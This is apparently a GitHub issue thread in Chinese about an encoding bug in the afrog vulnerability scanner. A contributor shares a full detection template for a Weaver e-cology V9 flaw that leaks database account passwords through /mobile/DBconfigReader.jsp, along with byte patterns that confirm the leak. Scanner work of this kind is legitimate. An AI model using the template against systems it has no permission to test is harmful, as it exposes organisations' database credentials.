关于一个小小的编码问题

[forktopot]

我在编写如下poc 验证时发现一个问题，返回包的编码问题可能会影响类似这种匹配规则 response.body.bcontains(b'\x7e\x70\x05\x53\x6e')

编写的poc内容如下： id: e-cology-weaver-v9-dbconfigreader-info-leak

info: name: 泛微OA e-cology V9前台数据库帐号密码信息泄漏漏洞 author: secse(https://github.com/forktopot) severity: high description: 泛微OA ecology v9数据库帐号密码信息泄漏漏洞 app="Weaver-OA" reference:

• https://github.com/jas502n/DBconfigReader

rules: r0: request: method: GETF path: /mobile/DBconfigReader.jsp follow_redirects: false expression: response.status == 200 && (response.body.bcontains(b'\x7e\x70\x05\x53\x6e') || response.body.bcontains(b'\x7e\x70\x05\x40\x73')) expression: r0()

该poc我在xray 上使用是完全没有问题然后改过来的 一开始无法验证，然后我把 pkg/protocols/http/retryhttpclient/client.go p179 行修改后便可以验证了

[forktopot]

将这个转utf8 这个去掉应该是完全不会影响漏洞验证的

[zan8in]

我已经忘记了当初增加 utf8 转码的真正原因，也许只是为了防止 HTML 报告出现乱码问题。 我需要验证一下 GBK 响应是否影响漏洞验证，如果没问题，我会下个版本修复它。

[zan8in]

@forktopot 经过本地验证，GBK 响应不影响漏洞验证，下个版本会更新此问题。

[forktopot]

@zan8in 你好，看了下你的commit，不知道你的utf-8 改回来是什么原因，我又测试了下，确实是影响了poc验证，比如，ecology-oa-database-info-leak，可能你在验证的过程中刚好遇到了使用utf8也不影响ecology-oa-database-info-leak该poc验证的网站，但是我在验证的测试中，确实发现了utf-8编码影响的站点，如果方便的话，可以加微信聊下

[zan8in]

@forktopot 好的，感谢，这是我的微信 https://github.com/zan8in/afrog#discussion-group